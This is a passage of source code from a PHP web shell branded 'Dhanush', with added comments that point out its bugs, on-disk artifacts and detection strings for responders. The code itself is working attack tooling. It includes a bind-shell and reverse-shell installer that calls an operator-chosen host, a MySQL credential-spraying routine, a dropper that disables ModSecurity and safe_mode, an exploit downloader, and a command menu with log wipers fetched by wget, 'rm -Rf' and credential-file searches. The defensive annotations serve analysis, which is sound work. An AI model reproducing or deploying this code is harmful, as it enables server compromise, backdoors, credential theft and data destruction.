7332<option value="phizo">Phizo</option>
7333<option value="orange">Orange</option>
7334</select>
7335</form></td>
7336</tr></table>
7337<hr color="#1B1B1B">
7338
7339<table cellpadding="0" style="width:100%;">
7340 <tr>
7341 <td colspan="2" style="width:85%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
7342 <td style="width:7%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
7343 <td style="width:8%;"><a href=# onClick="maindata('com')"><font class="txt"><i>Software Info</i></font></a></td>
7344 </tr>
7345 <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
7346 <td style="width:85%;" colspan="2">Uid : <font class="txt"><?php if(shell_exec("id")){echo shell_exec("id");}else{echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid();} ?></font></td>
7347 <?php $d0mains = @file("/etc/named.conf");
7348 $users=@file('/etc/passwd');
7349 if($d0mains)
7350 {
7351 $count;
7352 foreach($d0mains as $d0main)
7353 {
7354 if(@ereg("zone",$d0main))
7355 {
7356 preg_match_all('#zone "(.*)"#', $d0main, $domains);
7357 flush();
7358 if(strlen(trim($domains[1][0])) > 2)
7359 {
7360 flush();
7361 $count++;
7362 }
7363 }
7364 }
7365 ?><td style="width:7%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php
7366 }
7367 else if($users)
7368 {
7369 $file = fopen("/etc/passwd", "r");
7370 while(!feof($file))
7371 {
7372 $s = fgets($file);
7373 $matches = array();
7374 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
7375 $matches = str_replace("home/","",$matches[1]);
7376 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
7377 continue;
7378 $count++;
7379 }
7380 ?><td style="width:7%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php } ?>
7381 <?php if($os == "Linux") { ?><td style="width:8%;vertical-align:text-top;"><a href="<?php echo $self.'?downloadit'?>">Download It</a></td><?php } ?>
7382 </tr><?php } ?>
7383 <tr>
7384 <td style="width:20%;">Free Space : <font class="txt"><?php echo HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); ?> of <?php echo HumanReadableFilesize(diskSpace()); echo " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
7385 <td style="width:20%;vertical-align:text-top;">Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
7386
7387 <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
7388 <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
7389 </tr>
7390
7391 <tr>
7392 <?php if($os == 'Windows'){ ?><td style="width:15%;vertical-align:text-top;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
7393 <td style="width:30%;vertical-align:text-top;">Current Directory : <span id="crdir"><font color="#009900">
7394 <?php
7395 $d = str_replace("\\",$directorysperator,$dir);
7396 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
7397 $d = str_replace("\\\\","\\",$d);
7398 $dispd = htmlspecialchars($d);
7399 $pd = $e = explode($directorysperator,substr($d,0,-1));
7400 $i = 0;
7401 foreach($pd as $b)
7402 {
7403 $t = '';
7404 $j = 0;
7405 foreach ($e as $r)
7406 {
7407 $t.= $r.$directorysperator;
7408 if ($j == $i) {break;}
7409 $j++;
7410 }
7411$href=addslashes($t);
7412
7413 echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
7414 $i++;
7415 }
7416
7417 ?>
7418 </font></span> <a href=# onClick="gethome('home','<?php echo addslashes(getcwd()); ?>')">[Home]</a></td>
7419 <td colspan="3" style="width:20%;max-width:200px;word-break:break-all;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
7420 </tr>
7421 </table>
7422
<?php
// Module menu. $m1/$m2 map a label to the module name passed to the
// maindata() JS function; the module names are what the AJAX handlers
// elsewhere in the file dispatch on (a useful list for log matching).
$m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
 $m2 = array('SQL'=>'database','Sub-Domain Creator'=>'subdomain','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
 echo "<table border=3 style=border-color:#333333; width=100%; cellpadding=2>
 <tr>";
 $menu = '';

 foreach($m1 as $k => $v)
 $menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
 echo $menu;
 echo "</tr>
</table>
<center>
<table style=\"border-color:#333333;\" border=2 width=70%; cellpadding=2>
 <tr align=center>";
 // Unlike $menu, $menu1 is never initialised before the first .= (E_NOTICE on
 // older PHP). $_GET['dir'] is placed into the onClick JS string through
 // addslashes() only, with no HTML-attribute escaping.
 foreach($m2 as $k => $v)
 $menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
 echo $menu1;
 // $self is assigned outside this block.
 echo "<td style=\"border:none;\"><a href=javascript:void(0) onClick=\"if(confirm('Are You Sure You Want To Kill This Shell ?')){getmydata('selfkill');}else{return false;}\"><font class=mainmenu>[SelfKill]</font></a></td>
 <td style=\"border:none;\"><a href=\"$self?logout\"><font class=mainmenu>[LogOut]</font></a></td>
 </tr>
</table></center>";?>
7444
7445<div id="showmaindata"></div>
7446<center><div id="showmydata"></div></center>
7447<?php
7448
// "Download It": archives the whole current directory into backup.tar (written
// in cwd) and streams it to the client. The archive is not deleted afterwards,
// so a stray backup.tar next to the shell is a lasting on-disk artifact.
// $FolderToCompress is interpolated unquoted into the tar command line.
// execmd() is defined outside this block.
if(isset($_GET["downloadit"]))
{
 $FolderToCompress = getcwd();
 execmd("tar --create --recursion --file=backup.tar $FolderToCompress");

 // explode() on a constant with no '/' yields a single element, so the loop
 // simply leaves $nfd = "backup.tar".
 $prd=explode("/","backup.tar");
 for($i=0;$i<sizeof($prd);$i++)
 {
 $nfd=$prd[$i];
 }
 // filesize()/readfile() results are not checked; a failed tar run still
 // sends the headers (with a false/0 length) before exit.
 @ob_clean();
 header("Content-type: application/octet-stream");
 header("Content-length: ".filesize($nfd));
 header("Content-disposition: attachment; filename=\"".$nfd."\";");
 readfile($nfd);
 exit;
}
//Turn Safe Mode Off
// Hardening-bypass dropper: whenever any function is disabled or safe_mode is
// on, three files are (over)written in the current directory -- `.htaccess`
// with ModSecurity 1.x-era SecFilter* directives, `ini.php` (a loader that
// include()s whatever the `file` / `ss` GET parameters name) and a local
// `php.ini`. fopen() results are never checked and only the last handle is
// closed; the first two leak until script end. These three files appearing
// together in a web directory are a strong indicator this shell has run.
// getDisabledFunctions() and safe() are defined outside this block.
if(getDisabledFunctions() != "None" || safe() != "OFF")
{
 $file_pointer = fopen(".htaccess", "w+");
 fwrite($file_pointer, "<IfModule mod_security.c>
 SecFilterEngine Off
 SecFilterScanPOST Off
 </IfModule> \n\r");

 // Handle above is overwritten without fclose().
 $file_pointer = fopen("ini.php", "w+");
 fwrite($file_pointer, "<?
echo ini_get(\"safe_mode\");
echo ini_get(\"open_basedir\");
include(\$_GET[\"file\"]);
ini_restore(\"safe_mode\");
ini_restore(\"open_basedir\");
echo ini_get(\"safe_mode\");
echo ini_get(\"open_basedir\");
include(\$_GET[\"ss\"]);
?>");

 // Handle above is overwritten without fclose().
 $file_pointer = fopen("php.ini", "w+");
 fwrite($file_pointer, "safe_mode = Off");

 fclose($file_pointer);

 }
7493
// Request dispatcher for the main page. Each branch is keyed on a request
// parameter and only the first match runs. Several branches write helper
// programs to disk and launch them; the file names, process names and banner
// strings below are the artifacts a responder can hunt for. execmd(),
// exec_all(), paramexe(), download() and the $bind_port_c / $bind_port_p /
// $backconnect_perl / $back_connect_p payload strings are defined outside
// this block.
if(isset($_POST['cpanelattack']))
{
 // Credential spraying against the local MySQL server: each user from the
 // POSTed username list (text before the first ':' per line) is tried
 // against every line of the POSTed password list.
 if(!empty($_POST['username']) && !empty($_POST['password']))
 {
 // $userlist / $passlist are never read; $e / $a2 below re-split the same input.
 $userlist=explode("\n",$_POST['username']);
 $passlist=explode("\n",$_POST['password']);

 $e = explode("\n",$_POST['username']);
 foreach($e as $value)
 {
 $k = explode(":",$value);
 // $username is not initialised before the first .= (E_NOTICE on older PHP).
 $username .= $k['0']." ";
 }

 $a1 = explode(" ",$username);
 $a2 = explode("\n",$_POST['password']);
 $id2 = count($a2);
 $ok = 0;
 foreach($a1 as $user)

 {
 if($user !== '')
 {
 $user=trim($user);
 // Off-by-one: `<=` also reads $a2[$id2], one past the last element.
 for($i=0;$i<=$id2;$i++)
 {
 $pass = trim($a2[$i]);
 // mysql_connect() was removed in PHP 7.0, so this branch fatals on
 // current PHP. Where it still works, each failed attempt is typically
 // visible in the MySQL error log as an access-denied login from localhost.
 if(@mysql_connect('localhost',$user,$pass))
 {
 echo "User is (<b>$user</b>) Password is (<b><font class='txt'>$pass</font></b>)<br />";
 $ok++;
 }
 }
 }
 }
 echo "<hr><b>You Found <font color=red>$ok</font></b>";
 }
 else
 $bdmessage = "<center>Enter Username & Password List<center>";
}
// Stores the raw request value in the `style` cookie; header() is not followed
// by exit, so the rest of the page still renders in this request.
elseif(isset($_GET['style']))
{
 setcookie('style',$_GET['style']);
 header("location:$self");
}
// $_GET['info'] is concatenated straight into the shell command line
// (no escapeshellarg()); whatever is passed reaches the shell.
else if(isset($_GET['info']))
{
 $bdmessage = "<br><div align=left><font class=txt>".nl2br(shell_exec("whois ".$_GET['info']))."</font></div>";
}
// File upload to an arbitrary existing directory named by the `path` request
// parameter; the client-supplied file name is used as-is. $os and
// $directorysperator are set outside this block; both OS branches build the
// identical path. $setuploadvalue, $tempName and $stat are never read.
else if(isset($_POST['u']))
{
 $path = $_REQUEST['path'];
 if(is_dir($path))
 {
 $setuploadvalue = 0;
 $uploadedFilePath = $_FILES['uploadfile']['name'];
 $tempName = $_FILES['uploadfile']['tmp_name'];
 if($os == "Windows")
 $uploadPath = $path . $directorysperator . $uploadedFilePath;
 else if($os == "Linux")
 $uploadPath = $path . $directorysperator . $uploadedFilePath;
 if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
 $bdmessage = "<font class=txt size=3><blink>File uploaded to $uploadPath</blink></font>";
 else
 $bdmessage = "<font size=3><blink>Failed to upload file to $uploadPath</blink></font>";
 }
 ?><script type="text/javascript">changedir('dir','<?php echo addslashes($path); ?>'); </script><?php
}
// Bind-shell installer. Artifacts: `backp.c` / `backp` (C, compiled with gcc)
// or `bp.pl` (Perl), written to cwd when writable, otherwise /tmp; the program
// is started in the background with the POSTed port and password, so the
// listening port plus a `backp` / `bp.pl` process are the live indicators.
// The written files are NOT removed afterwards.
else if(isset($_POST['backdoor']))
{
 if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
 { ?><script type="text/javascript">gethome('connect');</script><?php
 $passwd = $_POST['passwd'];

 if($_POST['lang'] == 'c')
 {
 if(is_writable("."))
 {
 @$fh=fopen(getcwd()."/backp.c",'w');
 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
 @fclose($fh);
 execmd("chmod 0755 ".getcwd()."/backp.c");
 execmd("gcc -o ".getcwd()."/backp ".getcwd()."/backp.c");
 execmd("chmod 0755 ".getcwd()."/backp");
 // $_POST['port'] and $passwd go onto the command line unescaped.
 execmd(getcwd()."/backp"." ".$_POST['port']." ". $passwd ." &");
 $scan = exec_all("ps aux | grep backp".$_POST['port']);
 // eregi() was removed in PHP 7.0; this check fatals on current PHP.
 if(eregi("backp".$_POST['port'],$scan))
 $bdmessage = "Process found running, backdoor setup successfully.";
 else
 $bdmessage = "Process not found running, backdoor not setup successfully.";
 }
 else
 {
 @$fh=fopen("/tmp/backp.c","w");
 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
 @fclose($fh);
 execmd("chmod 0755 /tmp/backp.c");
 execmd("gcc -o /tmp/backp /tmp/backp.c");
 $out = execmd("/tmp/backp"." ".$_POST['port']." ". $passwd ." &");
 $scan = exec_all("ps aux | grep backp".$_POST['port']);
 if(eregi("backp".$_POST['port'],$scan))
 $bdmessage = "Process found running, backdoor setup successfully.";
 else
 $bdmessage = "Process not found running, backdoor not setup successfully.";
 }
 }
 // Plain `if`, not `else if`: harmless here because lang cannot be both.
 if($_POST['lang'] == 'perl')
 {
 if(is_writable("."))
 {
 @$fh=fopen(getcwd()."/bp.pl",'w');
 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
 @fclose($fh);
 execmd("chmod 0755 ".getcwd()."/bp.pl");
 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");

 // $out is never assigned in this branch (only in the C /tmp branch above).
 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
 }
 else
 {
 // Bug: the script is written to /tmp/bp.pl but the chmod and the launch
 // below still reference getcwd()."/bp.pl", so this fallback never runs
 // what it wrote.
 @$fh=fopen("/tmp/bp.pl","w");
 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
 @fclose($fh);
 execmd("chmod 0755 ".getcwd()."/bp.pl");
 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
 }
 }
 }
}
// Reverse-connection launcher. The Perl/Python variants write `bc.pl` /
// `bc.py` (cwd or /tmp), start them in the background and then unlink the
// file, so a running perl/python process with an outbound connection is the
// main evidence, not the file. The PHP variant connects from this process
// itself. $disable is passed to execmd() but is not defined in this block.
else if(isset($_POST['backconnect']))
{
 if($_POST['ip'] != "" && $_POST['port'] != "")
 { ?><script type="text/javascript">gethome('connect');</script><?php
 $host = $_POST['ip'];
 $port = $_POST['port'];
 if($_POST["lang"] == "perl")
 {
 if(is_writable("."))
 {
 @$fh=fopen(getcwd()."/bc.pl",'w');
 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
 @fclose($fh);
 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
 // $host / $port are interpolated into the command line unescaped.
 execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
 if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
 }
 else
 {
 @$fh=fopen("/tmp/bc.pl","w");
 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
 @fclose($fh);
 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
 execmd("perl /tmp/bc.pl $host $port &",$disable);
 if(!@unlink("/tmp/bc.pl"))
 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
 }
 }
 else if($_POST["lang"] == "python")
 {
 if(is_writable("."))
 {
 // `or die(mysql_error())` is meaningless here (no MySQL involvement) and
 // is unreachable anyway because the @-suppressed fopen() result is
 // checked again on the next line.
 $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error());
 if($w_file)
 {
 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
 @fclose($w_file);
 chmod(getcwd().'/bc.py', 0777);
 }
 execmd("python ".getcwd()."/bc.py $host $port &",$disable);
 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";

 if(!@unlink(getcwd()."/bc.py"))
 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
 }
 else
 {
 $w_file=@fopen("/tmp/bc.py","w");
 if($w_file)
 {
 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
 @fclose($w_file);
 chmod('/tmp/bc.py', 0777);
 }
 execmd("python /tmp/bc.py $host $port &",$disable);
 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
 if(!@unlink("/tmp/bc.py"))
 echo "<h2>Warning: Failed to delete reverse-connection program</h2><br>";
 }
 }
 // In-process reverse shell over fsockopen(). The fixed banner
 // ("Coded By Arjun" between '=' rules) and the prompt "(dhanush)[$]> " are
 // sent in clear text and make good network-signature strings. The PHP
 // worker blocks in the read loop until the peer closes the socket.
 else if($_POST["lang"] == "php")
 {
 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
 $ip = $_POST['ip'];
 $port=$_POST['port'];
 $sockfd=fsockopen($ip , $port , $errno, $errstr );
 if($errno != 0)
 {
 $bdmessage = "<b>$errno</b> : $errstr";
 }
 else if (!$sockfd)
 {
 // $result is assigned but never read; the failure is not reported.
 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
 }
 else
 {
 fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n=================================================================");
 $pwd = exec_all("pwd");
 $sysinfo = exec_all("uname -a");
 $id = exec_all("id");
 $len = 1337;
 fputs($sockfd ,$sysinfo . "\n" );
 fputs($sockfd ,$pwd . "\n" );
 fputs($sockfd ,$id ."\n\n" );
 // $dateAndTime is not assigned anywhere in this block.
 fputs($sockfd ,$dateAndTime."\n\n" );
 while(!feof($sockfd))
 {
 $cmdPrompt ="(dhanush)[$]> ";
 fputs ($sockfd , $cmdPrompt );
 $command= fgets($sockfd, $len);
 fputs($sockfd , "\n" . exec_all($command) . "\n\n");
 }
 fclose($sockfd);
 }
 }
 }
}
// Local account enumeration over a numeric UID range via posix_getpwuid().
// The loop counter is $_GET['val1'] itself, which is mutated in place.
else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
{
 $temp = "";
 for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
 {
 $uid = @posix_getpwuid($_GET['val1']);
 if ($uid)
 $temp .= join(':',$uid)."\n";
 }
 echo '<br/>';
 paramexe('Users', $temp);
}
else if(isset($_GET['download']))
{
 download();
}
// Default: load the home listing for $dir (assigned outside this block).
else
{
 ?><script type="text/javascript">gethome('home','<?php echo addslashes($dir); ?>');</script><?php
}
$is_writable = is_writable($dir)?"<font class=txt>< writable ></font>":"< not writable >";
7742?>
7743</p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
7744<table class="btmtbl" style="width:100%;" border="1">
7745<tr>
7746<td class="btmtbl" align="center">
7747<form method="post" enctype="multipart/form-data">
7748Upload file : <br><input type="file" name="uploadfile" class="box" size="50">
7749<input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />
7750<input type=submit value="Upload" name="u" value="u" class="but" ></form>
7751<span name="wrtble"><?php
7752
7753echo $is_writable; ?></span>
7754 <br>
7755</td>
7756<td class="btmtbl" align="center" style="height:105px;">Create File :
7757<form onSubmit="createdir('Create',createfile.value);return false;">
7758<input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile" id="createfile">
7759<input type="button" onClick="createdir('Create',createfile.value)" value="Create" class="but">
7760</form><span name="wrtble">
7761<?php echo $is_writable; ?></span>
7762</td>
7763</tr>
7764<tr>
7765<td class="btmtbl" align="center" style="height:105px;">Execute : <form onSubmit="executemyfile('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
7766<input type="text" class="box" name="execute">
7767<input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
7768 <input type="button" onClick="executemyfile('execute',exepath.value,execute.value)" value="Execute" class="but"></form></td>
7769
7770<td class="btmtbl" align="center">Create Directory : <form onSubmit="createdir('createfolder',createfolder.value);return false;">
7771<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder" id="createfolder">
7772<input type="button" onClick="createdir('createfolder',createfolder.value)" value="Create" class="but">
7773</form><span name="wrtble"><?php
7774echo $is_writable;
7775?></span></td></tr>
7776<tr>
7777<td class="btmtbl" align="center">Read File<form onSubmit="createdir('readfile',readfile.value);return false;">
7778<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="readfile" id="readfile">
7779<input type="button" onClick="createdir('readfile',readfile.value)" value="Read" class="but">
7780</form></td>
7781<td class="btmtbl" align="center">Read Directory<form onSubmit="changedir('dir',readdir.value);return false;">
7782<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="readdir" id="readdir">
7783<input type="button" onClick="changedir('dir',readdir.value)" value=" View " class="but">
7784</form></td></tr>
7785<tr><td class="btmtbl" style="height:105px;" align="center">Get Exploit <form onSubmit="getexploit(wurl.value,path.value,functiontype.value);return false;">
7786<input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c">
7787<input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.value)" value=" G0 " class="but"><br><br>
7788<input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directorysperator; ?>">
7789<select name="functiontype" class="sbox">
7790<option value="wwget">wget</option>
7791<option value="wlynx">lynx</option>
7792<option value="wfread">fread</option>
7793<option value="wfetch">fetch</option>
7794<option value="wlinks">links</option>
7795<option value="wget">GET</option>
7796<option value="wcurl">curl</option>
7797</select>
7798</form><div id="showexp"></div>
7799</td>
7800<td class="btmtbl" align="center">
7801<form>
7802Some Commands<br>
7803<?php if($os != "Windows")
7804{ ?>
7805<SELECT NAME="mycmd" class="box">
7806 <OPTION VALUE="uname -a">Kernel version
7807 <OPTION VALUE="w">Logged in users
7808 <OPTION VALUE="lastlog">Last to connect
7809 <option value='cat /etc/hosts'>IP Addresses
7810 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
7811 <OPTION VALUE="logeraser">Log Eraser
7812 <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
7813 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
7814 <OPTION VALUE="find / -type f -name 'config'">find config files
7815 <OPTION VALUE="find . -type f -name \"config\"">find config files in current dir
7816
7817 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
7818 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
7819 <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
7820 <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
7821 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
7822 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
7823 <OPTION VALUE="ps aux">Show running proccess
7824 <OPTION VALUE="uptime">Uptime check
7825 <OPTION VALUE="cat /proc/meminfo">Memory check
7826 <OPTION VALUE="netstat -an | grep -i listen">Open ports
7827 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
7828 <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
7829 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
7830 <OPTION VALUE="./zap2">WIPELOGS PT3
7831 <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
7832 </SELECT>
7833 <?php } else {?>
7834 <SELECT NAME="mycmd" class="box">
7835 <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
7836 <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
7837 <OPTION VALUE="systeminfo">System Informations
7838 <OPTION VALUE="net user">User accounts
7839 <OPTION VALUE="netstat -an">Open ports
7840 <OPTION VALUE="getmac">Get Mac Address
7841 <OPTION VALUE="net start">Show running services
7842 <OPTION VALUE="net view">Show computers
7843 <OPTION VALUE="arp -a">ARP Table
7844 <OPTION VALUE="tasklist">Show Process
7845 <OPTION VALUE="ipconfig/all">IP Configuration
7846
7847 </SELECT>
7848 <?php } ?>
7849 <input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>">
7850<input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)" value="Execute" class="but">
7851</form>
7852</td>
7853</tr></table><br>
7854
7855</td>
7856</tr>
7857</table>
7858
7859<?php
7860
7861
//logout
// Note: setcookie()'s second argument is the cookie VALUE, so this stores a
// timestamp in `hacked` rather than expiring it; the cookie merely stops
// matching md5($pass). header() is not followed by exit.

if(isset($_GET['logout']))
{
 setcookie("hacked",time() - 60*60);
 header("Location:$self");
 ob_end_flush();
}
7870
7871}
7872}
7873
// Login handler. Credentials are compared with loose == against the $user /
// $pass configured earlier in the file. On success the `hacked` cookie is set
// to md5($pass) -- a constant for as long as the password is unchanged, so a
// captured cookie is a replayable session token with no expiry or binding.
// header() is not followed by exit, so the access gate below still runs in
// this same request (using the not-yet-updated $_COOKIE).
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
 if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
 {
 setcookie("hacked", md5($pass));
 // PHP_SELF is reflected into the Location header unescaped.
 $selfenter = $_SERVER["PHP_SELF"];
 header("Location:$selfenter");
 }
}
7883
// Access gate: any request without a `hacked` cookie equal to md5($pass) is
// shown the login form instead of the shell UI. The comparison is the loose
// != operator. The field names (uname / passwd), the cookie name and the
// "Dhanush" title are stable strings for request-log and response-body
// signatures. $shellstyle is assigned outside this block.
if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
{
 echo $shellstyle;
?>
 <center>
 <form method="POST">
 <div class="logindiv" style="width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px;">
 <table cellpadding="9" cellspacing="4">
 <tr>
 <td align="center" colspan="2"><blink><font size="7"><b>Dhanush</b></font></blink></td>
 </tr>
 <tr>
 <td align="right"><b>User Name : </b></td>
 <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
 </tr>
 <tr>
 <td align="right"><b>Password : </b></td>
 <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
 </tr>
 <tr>
 <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
 </tr>
 <tr>
 <td colspan="2"><font size="4" face="Times New Roman, Times, serif"><noscript>Enable Javascript in your browser for the proper working of the shell</noscript></font></td>
 </tr>
 </table>
 </div>

 </form>
 </center>
<br>

</body>
</html>
<?php
// End of the unauthenticated branch; the shell UI above this gate only
// renders for requests carrying the matching cookie.
}
7920?>